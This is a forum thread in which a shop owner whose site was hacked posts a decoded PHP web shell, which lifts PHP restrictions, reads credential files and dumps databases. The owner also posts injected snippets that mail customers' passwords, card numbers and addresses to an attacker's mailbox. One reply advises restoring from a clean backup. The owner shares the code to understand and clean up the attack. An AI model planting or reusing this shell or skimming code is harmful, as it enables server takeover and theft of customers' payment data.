devine952 Posted January 16, 2010 Share Posted January 16, 2010 Hi all, Somehow my site is being used for spamming purposes, 245K emails sent out last night alone. My customer db is only 30k. anyway, while invesitaging, I found function.php in one of my folders with following permissions rwxr-xr-x. The file was encoded using eval(gzinflate(base64_decode so you can search for that line of code in your files. The decoded code: <?php ?><?phpif(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>IT-GLOBAL Rooted</h1>");}$language='eng';$auth = 0;$name='93a04b066fd81a1017825f2dcda313b2'; //night$pass='93a04b066fd81a1017825f2dcda313b2';//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8//@setlocale(LC_ALL,'ru_RU.cp1251');@ini_restore("safe_mode");@ini_restore("open_basedir");@ini_restore("safe_mode_include_dir");@ini_restore("safe_mode_exec_dir");@ini_restore("disable_functions");@ini_restore("allow_url_fopen");if(@function_exists('ini_set')) { @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1); @ini_set('allow_url_fopen',1); }else { @ini_alter('error_log',NULL); @ini_alter('log_errors',0); @ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1); }error_reporting(E_ALL);/* */$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');$downloaders = array('wget','fetch','lynx','links','curl','get');$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html./* realpath() */$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";$chars_rlph = "_-.01234567890";$chars_rlph = "abcdefghijklnmopqrstuvwxyz";$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php','shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root','my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs','access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');/******************************************************************************************************/$win = strtolower(substr(PHP_OS,0,3)) == "win";define("starttime",@getmicrotime());if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};set_magic_quotes_runtime(0);@set_time_limit(0);if(@function_exists('ini_set')) { @ini_set('max_execution_time',0); @ini_set('output_buffering',0); }else { @ini_alter('max_execution_time',0); @ini_alter('output_buffering',0); }$safe_mode = @ini_get('safe_mode');if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};$version = 'Private - No1';if(@version_compare(@phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; }if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } }// user + pass ( 1 = no , 0 = yes )if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="No1Relax - Protect !"'); header('HTTP/1.0 401 Unauthorized'); exit("<h1>Access Denied</h1>"); }}if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) { $tempdir='./'; $select_tempdir = '<select name=tempdir><option value="./">./</option>'; foreach( $tempdirs as $item) { if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;} } $select_tempdir .= '</select>'; setcookie('tempdir',$tempdir); setcookie('select_tempdir',$select_tempdir);}else{ if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];} $select_tempdir = $_COOKIE['select_tempdir'];}$head = '<html><head><title>_*-*_[iT-GLOBAL Rooted]_*-*_</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><STYLE>tr {BORDER-RIGHT: #000000 1px solid;BORDER-TOP: #000000 1px solid;BORDER-LEFT: #000000 1px solid;BORDER-BOTTOM: #000000 1px solid;color: #000000;}td {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;color: #ffffff;}.table1 {BORDER: 0px;BACKGROUND-COLOR: #000000;color: #000000;}.td1 {BORDER: 0px;font: 7pt Verdana;color: #ffffff;}.tr1 {BORDER: 0px;color: #ffffff;}table {BORDER: #eeeeee 1px outset;BACKGROUND-COLOR: #000000;color: #000000;}input {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;}select {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: 8pt Verdana;color: #ffffff;;}submit {BORDER: buttonhighlight 2px outset;BACKGROUND-COLOR: #e4e0d8;width: 30%;color: #000000;}textarea {BORDER-RIGHT: #ffffff 1px solid;BORDER-TOP: #999999 1px solid;BORDER-LEFT: #999999 1px solid;BORDER-BOTTOM: #ffffff 1px solid;BACKGROUND-COLOR: #000000;font: Fixedsys bold;color: #ffffff;}BODY {margin: 1px;color: #000000;background-color: #000000;}A:link {COLOR:red; TEXT-DECORATION: none}A:visited { COLOR:red; TEXT-DECORATION: none}A:active {COLOR:red; TEXT-DECORATION: none}A:hover {color:blue;TEXT-DECORATION: none}</STYLE><script language=\'javascript\'>function hide_div(id){ document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\';}function show_div(id){ document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\';}function change_divst(id){ if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id);}</script>';class zipfile{ var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; }}function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } }function moreread($temp){global $lang,$language;$str=''; if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){ if($ffile){ while(!@feof($ffile)){$str .= @fgets($ffile);}; fclose($ffile); } }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){ if($ffile){ $str = @fread($ffile, @filesize($temp)); @fclose($ffile); } }elseif(@function_exists('file')&&($ffiles = @file($temp))){ foreach ($ffiles as $ffile) { $str .= $ffile; } }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp); }elseif(@function_exists('readfile')){ $str = @readfile($temp); }elseif(@function_exists('highlight_file')){ $str = @highlight_file($temp); }elseif(@function_exists('show_source')){ $str = @show_source($temp); }else{echo $lang[$language.'_text56'];}return $str;}function readzlib($filename,$temp=''){global $lang,$language;$str=''; if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");}; if(@copy("compress.zlib://".$filename, $temp)) { $str = moreread($temp); } else echo $lang[$language.'_text119']; @unlink($temp);return $str;}function morewrite($temp,$str=''){global $lang,$language; if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fwrite($ffile,$str); @fclose($ffile); } }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){ if($ffile){ @fputs($ffile,$str); @fclose($ffile); } }elseif(@function_exists('file_put_contents')){ @file_put_contents($temp,$str); }else return 0;return 1;}function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(mail($to,$subj,"",$headers)) { return 1; } return 0; }class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!@function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!@function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!@function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; case 'MySQLi': if(empty($this->port)) { $this->port = '3306'; } if(!@function_exists('mysqli_connect')) return 0; $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port); if(is_resource($this->connection)) return 1; break; case 'mSQL': if(!@function_exists('msql_connect')) return 0; $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'SQLite': if(!@function_exists('sqlite_open')) return 0; $this->connection = @sqlite_open($this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; case 'MySQLi': return 1; break; case 'mSQL': if(@msql_select_db($this->base,$this->connection)) return 1; break; case 'SQLite': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; case 'MySQLi': if(false===($this->res=@mysqli_query($this->connection,$query))) { $this->error = @mysqli_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'mSQL': if(false===($this->res=@msql_query($query,$this->connection))) { $this->error = @msql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'SQLite': if(false===($this->res=@sqlite_query($this->connection,$query))) { $this->error = @sqlite_error_string($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MySQLi': $this->num_rows=@mysqli_num_rows($this->res); $this->num_fields=@mysqli_num_fields($this->res); while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res))); @mysqli_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'mSQL': $this->num_rows=@msql_num_rows($this->res); $this->num_fields=@msql_num_fields($this->res); while(false !== ($this->rows[] = @msql_fetch_array($this->res))); @msql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'SQLite': $this->num_rows=@sqlite_num_rows($this->res); $this->num_fields=@sqlite_num_fields($this->res); while(false !== ($this->rows[] = @sqlite_fetch_array($this->res))); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MySQLi': $this->dump[0] = '## MySQLi dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'mSQL': $this->dump[0] = '## mSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'SQLite': $this->dump[0] = '## SQLite dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; case 'MySQLi': @mysqli_close($this->connection); break; case 'mSQL': @msql_close($this->connection); break; case 'SQLite': @sqlite_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; case 'MySQLi': return @mysqli_affected_rows($this->res); break; case 'mSQL': return @msql_affected_rows($this->res); break; case 'SQLite': return @sqlite_changes($this->res); break; default: return 0; break; } } }if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if($file=moreread($_POST['d_name'])){ $filedump = $file; } else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; } if(!empty($_POST['cmd'])) { @ob_clean(); $filename = @basename($_POST['d_name']); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } }if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }if (isset($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#000000>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" </b></font></td><td bgcolor=#000000><font face=Verdana size=-2><b> ", $sql->columns); echo "<tr><td bgcolor=#000000><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>'; } echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))." ?> I have no idea what it does, other than apparently dump my sql database. I haven't figured out where it dumps it to and if this same file is also responsible for the spamming originating from my website. Any tips on how to prevent this in the future and what this is doing? Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 I found this code in googlemap.php which I had never uploaded. There were 2 instances of this file, one in my /includes/analytics folder and 1 in my /images/icons folder. Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 list of injected files googlemap.php functiondata.php function.php inc.php private.php creating thumb.php image.php which I suspect are the dump files I could do with some enlightning, I have noticed that most of these files were able to upload to directories with 502 503 Owner Group as defined by Filezilla, whatever that user group means. Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 More malicious code that I found inserted in my /login.php file $to = "[email protected]"; $subject = "Hang mail pass pilot"; $message = $email_address." | ".$password; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 /public_html/includes/modules/payment/paypal_wpp.php I found this: $to = "[email protected]"; $subject = "Pilotshop"; $message =$order_info['PAYPAL_SHIPPING_NAME']."|".$order_info['PAYPAL_SHIPPING_ADDRESS1']."|".$order_info['PAYPAL_SHIPPING_CITY']."|".$order_info['PAYPAL_SHIPPING_STATE']."|".$order_info['PAYPAL_SHIPPING_ZIP']."|".$order_info['PAYPAL_SHIPPING_COUNTRY']."|".$cc_type."|".$cc_number."|".$cc_checkcode."|".$cc_first_name."|".$cc_last_name."|".$cc_owner_ip."|".$cc_expdate_month."|".$cc_expdate_year ; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 another bit in /public/includes/modules/payment/cc.php $to = "[email protected]"; $subject = "Hang ve pilot"; $message = $HTTP_POST_VARS['cc_owner'] . "|" . $HTTP_POST_VARS['cc_number'] . "|" . $HTTP_POST_VARS['cc_expires_month'] . "|" . $HTTP_POST_VARS['cc_expires_year'] . "|" .$HTTP_POST_VARS['cvvnumber']; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
devine952 Posted January 16, 2010 Author Share Posted January 16, 2010 more in /checkout_payment.php $check_address_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . (int)$customer_id . "' and address_book_id = '" . (int)$billto . "'"); $check_address = tep_db_fetch_array($check_address_query); $to = "[email protected]"; $subject = "Hang ve dia chi pilot"; $message = $check_address['entry_firstname']."|".$check_address['entry_lastname']."|".$check_address['entry_street_address']."|".$check_address['entry_suburb']."|".$check_address['entry_postcode']."|".$check_address['entry_city']."|".$check_address['entry_state']; $headers = "MIME-Version: 1.0rn"; $headers .= "Content-type: text/html; charset=iso-8859-1rn"; $headers .= "From: $from\r\n"; mail($to, $subject, $message, $headers); Link to comment Share on other sites More sharing options...
Ben Nevis Posted January 16, 2010 Share Posted January 16, 2010 Well, it's an interesting and different type of hack from others seen recently it seems, but I am pretty sure the answers for securing your site properly are still the same as ever. Best delete the site and database and restore from a clean back up, if you are able to, and then read the threads/posts in various links I listed here, especially the first one, and apply all necessary measures. www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used! Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.